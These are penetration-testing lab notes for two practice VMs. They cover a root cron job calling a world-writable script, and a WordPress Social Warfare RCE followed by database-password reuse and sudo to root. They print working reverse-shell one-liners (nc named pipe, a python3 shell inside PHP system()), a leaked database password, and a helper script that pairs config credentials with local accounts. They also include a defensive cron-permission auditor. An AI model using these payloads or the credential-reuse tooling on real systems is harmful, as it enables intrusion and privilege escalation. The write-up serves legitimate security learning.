*/5 *   * * *   root    cd /var/www/html/ && sudo ./finally.sh

```
Every five minutes root changes into `/var/www/html/` and runs `./finally.sh` (the `sudo` is redundant, cron already runs it as root). Look at what that script does and who may write to it:
```
www-data@sar:/tmp$ cd /var/www/html
cd /var/www/html
www-data@sar:/var/www/html$ ls
ls
finally.sh  index.html  phpinfo.php  robots.txt  sar2HTML  write.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh

./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh

touch /tmp/gateway
www-data@sar:/var/www/html$ ls -al
ls -al
total 40
drwxr-xr-x 3 www-data www-data  4096 Oct 21  2019 .
drwxr-xr-x 5 www-data www-data  4096 Jul 21 09:35 ..
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20  2019 index.html
-rw-r--r-- 1 www-data www-data    21 Oct 20  2019 phpinfo.php
-rw-r--r-- 1 root     root         9 Oct 21  2019 robots.txt
drwxr-xr-x 4 www-data www-data  4096 Oct 20  2019 sar2HTML
-rwxrwxrwx 1 www-data www-data    30 Oct 21  2019 write.sh
www-data@sar:/var/www/html$

```
`finally.sh` itself is root-owned and not writable, but all it does is call `./write.sh`, which is `-rwxrwxrwx` and owned by `www-data`. Anything written into `write.sh` therefore runs as root within five minutes. This is the classic cron-job-in-the-web-root mistake: scripts executed by root belong in a root-owned, non-writable directory, never under the document root of a process that can be compromised remotely.
### Root
Overwrite `write.sh` with a named-pipe reverse shell pointing at a second listener, then wait for the next run:
```
www-data@sar:/var/www/html$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.63 4445 >/tmp/f" > write.sh
```
```
└─$ nc -nvlp 4445                                                                                                     130 ⨯
listening on [any] 4445 ...
```
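While waiting for the next five-minute tick, here is an added audit script (not part of the original notes) for exactly this class of bug: it reads a system crontab, resolves the programs each job runs by path, follows `cd` and one level of `./other.sh` calls inside shell scripts, and reports files that a low-privileged user could rewrite. `build_fixture()` recreates the `finally.sh -> write.sh` chain from this box in a temporary directory; the directory layout, modes and crontab text are constructed for the demo, and programs found via `PATH` (`run-parts`, `touch`) are deliberately not followed.

```python
"""
Added example, not part of the original notes: an audit that reads a system
crontab, resolves the programs each job executes by path (following a leading
`cd` and one level of `./other.sh` calls inside shell scripts), and reports
files that a low-privileged user could rewrite. build_fixture() recreates this
box's finally.sh -> write.sh chain in a temporary directory; the layout, modes
and crontab text are constructed for the demo.
"""
import os
import re
import shlex
import shutil
import stat
import tempfile
from typing import Dict, List, Tuple

CRON_RE = re.compile(r"^(?P<sched>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
SEP_RE = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")
WRAPPERS = {"sudo", "nice", "nohup", "env"}   # prefixes that do not change what runs
MAX_DEPTH = 2                                 # cron command -> script -> script it calls


def parse_system_crontab(text: str) -> List[Dict[str, str]]:
    """/etc/crontab format: five schedule fields, the user, then the command."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]+=", line):
            continue                                   # comments and PATH=... lines
        m = CRON_RE.match(line)
        if m:
            jobs.append({"user": m.group("user"), "command": m.group("cmd")})
    return jobs


def invoked_programs(command: str, cwd: str = "/") -> Tuple[List[str], str]:
    """Executables a shell command line invokes by path, resolved against the
    cwd left by a preceding `cd`; returns (paths, final_cwd). Arguments are
    ignored, and so are programs found via PATH (run-parts, touch, ...)."""
    programs: List[str] = []
    for segment in SEP_RE.split(command):
        try:
            words = [t for t in (x.strip("()") for x in shlex.split(segment))
                     if t and t not in WRAPPERS and not t.startswith("-")]
        except ValueError:
            continue                                   # unbalanced quotes
        if not words:
            continue
        if words[0] == "cd":
            cwd = os.path.normpath(os.path.join(cwd, words[1])) if len(words) > 1 else "/"
        elif "/" in words[0]:
            programs.append(os.path.normpath(os.path.join(cwd, words[0])))
    return programs, cwd


def check_file(path: str, runs_as: str) -> List[str]:
    """Reasons an unprivileged user could control what this path executes."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["missing: creatable by anyone if the directory allows it"]
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append(f"group-writable (gid {st.st_gid})")
    if runs_as == "root" and st.st_uid != 0:
        reasons.append(f"owned by non-root uid {st.st_uid}")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons


def audit_crontab(text: str) -> List[Dict[str, object]]:
    findings: List[Dict[str, object]] = []
    seen = set()

    def walk(path: str, runs_as: str, chain: List[str], cwd: str, depth: int) -> None:
        if path in seen or depth > MAX_DEPTH:
            return
        seen.add(path)
        reasons = check_file(path, runs_as)
        if reasons:
            findings.append({"path": path, "runs_as": runs_as,
                             "chain": chain + [path], "reasons": reasons})
        try:
            with open(path, errors="replace") as fh:
                body = fh.read()
        except OSError:
            return
        if not body.startswith("#!"):
            return                                     # a binary: nothing to follow
        for line in body.splitlines()[1:]:
            if not line.lstrip().startswith("#"):
                for child in invoked_programs(line, cwd)[0]:
                    walk(child, runs_as, chain + [path], cwd, depth + 1)

    for job in parse_system_crontab(text):
        programs, cwd = invoked_programs(job["command"])
        for prog in programs:
            walk(prog, job["user"], [], cwd, 0)
    return findings


def build_fixture() -> Tuple[str, str]:
    """Constructed copy of the target's /var/www/html and its cron line."""
    root = tempfile.mkdtemp(prefix="sar-cron-demo-")
    html = os.path.join(root, "var", "www", "html")
    os.makedirs(html)
    with open(os.path.join(html, "finally.sh"), "w") as fh:
        fh.write("#!/bin/sh\n\n./write.sh\n")
    with open(os.path.join(html, "write.sh"), "w") as fh:
        fh.write("#!/bin/sh\n\ntouch /tmp/gateway\n")
    os.chmod(os.path.join(html, "finally.sh"), 0o755)   # -rwxr-xr-x root root on the box
    os.chmod(os.path.join(html, "write.sh"), 0o777)     # -rwxrwxrwx www-data www-data
    crontab = (
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        f"*/5 * * * * root cd {html}/ && sudo ./finally.sh\n"
    )
    return crontab, root


def demo() -> List[Dict[str, object]]:
    crontab, root = build_fixture()
    try:
        return audit_crontab(crontab)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for f in demo():
        print(f'[{f["runs_as"]}] {" -> ".join(f["chain"])}: {", ".join(f["reasons"])}')
```

On a real host, feed it `/etc/crontab` and the files under `/etc/cron.d`; the finding to act on is the one whose chain ends in a world-writable or non-root-owned script while `runs_as` is `root`, which is precisely `finally.sh -> write.sh` here.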
Within five minutes the cron job runs the modified `write.sh` as root and the callback arrives:
```
connect to [192.168.146.63] from (UNKNOWN) [192.168.146.58] 53684
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:8a:ff:1a brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.58/24 brd 192.168.146.255 scope global dynamic noprefixroute ens33
       valid_lft 69284sec preferred_lft 69284sec
    inet6 fe80::2009:6d57:8178:339f/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
# ls
finally.sh
index.html
phpinfo.php
robots.txt
sar2HTML
write.sh
# cd
# ls
root.txt
# cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
#

```
--------------------------------------------------------------------------------
/Target Notes/wpwnvm.md:
--------------------------------------------------------------------------------
# wpwnvm
## Information gathering
### Port enumeration
```
┌──(aaron㉿aacai)-[~/Desktop/wpwnvm]
└─$ sudo nmap -p- 192.168.146.65
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 17:27 HKT
Nmap scan report for 192.168.146.65
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:F9:0B:60 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds

└─$ sudo nmap -p22,80 -sV -A 192.168.146.65
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 17:27 HKT
Nmap scan report for 192.168.146.65
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
|   256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_  256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:F9:0B:60 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.146.65

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds

```
Only 22 and 80 are open; with no credentials for SSH, the way in is the web server.
### Web enumeration
![Img](../FILES/wpwnvm/img-20220814173522.png)
The root page is just an "under construction" placeholder.

Enumerate reachable paths with dirsearch:
```
[17:36:12] 200 -  134B  - /index.html
[17:36:21] 200 -   57B  - /robots.txt
[17:36:32] 200 -    7KB - /wordpress/wp-login.php
[17:36:32] 200 -   27KB - /wordpress/

```
![Img](../FILES/wpwnvm/img-20220814173742.png)

`robots.txt` is a decoy.

`/wordpress/` is a WordPress install, though, so run wpscan against it.

TIP: with a WPScan API token (`--api-token`), wpscan annotates the detected versions with their known vulnerabilities directly:
```
[i] Plugin(s) Identified:

[+] social-warfare
 | Location: http://192.168.146.65/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2021-07-20T16:09:00.000Z
 | [!] The version is out of date, the latest version is 4.3.0
 |
 | Found By: Comment (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
 |      - https://wordpress.org/support/topic/malware-into-new-update/
 |      - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
 |      - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
 |      - https://twitter.com/warfareplugins/status/1108826025188909057
 |      - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
 |      - https://www.webarxsecurity.com/social-warfare-vulnerability/
 |
 | Version: 3.5.2 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.146.65/wordpress/, Match: 'Social Warfare v3.5.2'
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.146.65/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.146.65/wordpress/wp-content/plugins/social-warfare/readme.txt

```

Enumerate users as well:
```
[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```
The plugin detected with 100% confidence, Social Warfare 3.5.2, is the interesting one; check searchsploit:
![Img](../FILES/wpwnvm/img-20220814175756.png)
It is an unauthenticated remote code execution bug (CVE-2019-9978). Download the exploit and read the code:
![Img](../FILES/wpwnvm/img-20220814175833.png)
The vulnerable endpoint is `wp-admin/admin-post.php`: with `swp_debug=load_options`, the plugin fetches the URL passed in `swp_url` and `eval()`s whatever appears between `<pre>` and `</pre>` in the response, so a text file hosted on the attacker machine, with the PHP wrapped in those tags, is enough. The hosted payload is a PHP `system()` call that launches a python3 reverse shell to 192.168.146.50:
![Img](../FILES/wpwnvm/img-20220814181711.png)
```
system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.146.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);\'')
```
Start a listener locally and serve the payload directory over HTTP with python3:
```
└─$ sudo python3 -m http.server 80
[sudo] password for aaron:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

┌──(aaron㉿aacai)-[~/Desktop/wpwnvm]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.146.50] from (UNKNOWN) [192.168.146.65] 49886

```

Then request the endpoint with curl, pointing `swp_url` at the file served from the local HTTP server. The callback arrives as the web server user, which is the initial foothold:
![Img](../FILES/wpwnvm/img-20220814182138.png)
## Privilege escalation
### Inspect the WordPress files
```
www-data@wpwn:/var/www/html/wordpress$ ls
ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

```
`wp-config.php` holds the database credentials:
```
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

```
Upgrade to an interactive shell with python, then try the database password against the other local account:
![Img](../FILES/wpwnvm/img-20220814182655.png)

The password is reused: the login succeeds.

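The credential-reuse check just performed by hand is worth scripting. The block below is an added example, not code from the original notes: it extracts the `define()` constants from a `wp-config.php` (handling PHP's single- and double-quoted string escapes), lists the local accounts that can actually take a login, and emits the `(account, password)` pairs to try with `su`. Both inputs are constructed samples; on a target they come from `/var/www/html/wordpress/wp-config.php` and `/etc/passwd`, and the account names `alice`, `bob` and `svc` are invented.

```python
"""
Added example, not part of the original notes: extract the database
credentials from a wp-config.php and pair them with the local accounts that
have a login shell, the credential-reuse check that turned www-data into a
real user on this box. Both inputs are constructed samples; on a target they
come from /var/www/html/wordpress/wp-config.php and /etc/passwd.
"""
import re
from typing import Dict, List, Tuple

# Constructed: define() lines as they appear in a stock wp-config.php.
WP_CONFIG_SAMPLE = r"""<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );
/** MySQL database username */
define( 'DB_USER', 'wp_user' );
/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
define('AUTH_KEY',         "put your unique phrase here");
define( 'WP_DEBUG', false );
$table_prefix = 'wp_';
"""

# Constructed /etc/passwd: system accounts plus two people who can log in.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/zsh
svc:x:999:999::/nonexistent:/bin/false
"""

# define( 'NAME', 'single-quoted' | "double-quoted" | bare value )
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[A-Za-z0-9_]+)\1\s*,\s*"""
    r"""(?:'(?P<sq>(?:\\.|[^'\\])*)'|"(?P<dq>(?:\\.|[^"\\])*)"|(?P<raw>[^)]+?))\s*\)"""
)
NO_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false", "/bin/sync", ""}


def _php_unescape(value: str, quote: str) -> str:
    """Undo PHP string escapes: single-quoted strings only escape the backslash
    and the quote itself; double-quoted ones also n, t, r, dollar and quote."""
    if quote == "'":
        return re.sub(r"\\([\\'])", r"\1", value)
    table = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", '"': '"', "$": "$"}
    return re.sub(r"\\(.)", lambda m: table.get(m.group(1), m.group(0)), value)


def parse_wp_config(text: str) -> Dict[str, str]:
    """Every define('NAME', value) in the file, as a name -> string map."""
    out: Dict[str, str] = {}
    for m in DEFINE_RE.finditer(text):
        if m.group("sq") is not None:
            out[m.group("name")] = _php_unescape(m.group("sq"), "'")
        elif m.group("dq") is not None:
            out[m.group("name")] = _php_unescape(m.group("dq"), '"')
        else:
            out[m.group("name")] = m.group("raw").strip()   # true/false/number/constant
    return out


def login_accounts(passwd_text: str, min_uid: int = 1000) -> List[str]:
    """root plus every uid >= min_uid whose shell can actually take a login."""
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, uid, shell = parts[0], int(parts[2]), parts[6]
        if shell in NO_LOGIN_SHELLS:
            continue
        if uid == 0 or uid >= min_uid:
            users.append(name)
    return users


def reuse_candidates(wp_config: str, passwd: str) -> List[Tuple[str, str]]:
    """(account, password) pairs to try with `su`; an OS account that shares
    the DB user's name goes first, since that reuse is the most common."""
    cfg = parse_wp_config(wp_config)
    password = cfg.get("DB_PASSWORD", "")
    if not password:
        return []
    accounts = login_accounts(passwd)
    db_user = cfg.get("DB_USER", "")
    ordered = [u for u in accounts if u == db_user] + [u for u in accounts if u != db_user]
    return [(u, password) for u in ordered]


if __name__ == "__main__":
    for account, password in reuse_candidates(WP_CONFIG_SAMPLE, PASSWD_SAMPLE):
        print(f"su - {account}    # password: {password}")
```

`su` reads the password from the controlling terminal, so the attempts have to be made from a pty shell (the `python -c 'import pty; ...'` upgrade used above, or `script -qc /bin/bash /dev/null` where python is missing); the script only produces the list, it does not try the logins itself.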
`sudo -l` shows that this account may run any command as any user:

![Img](../FILES/wpwnvm/img-20220814182845.png)

So `sudo su` is all it takes:
![Img](../FILES/wpwnvm/img-20220814182827.png)

Root obtained. The whole chain is an outdated plugin for the foothold, then a database password reused as an OS password, then an unrestricted sudoers entry; any one of the three fixed would have stopped it.
--------------------------------------------------------------------------------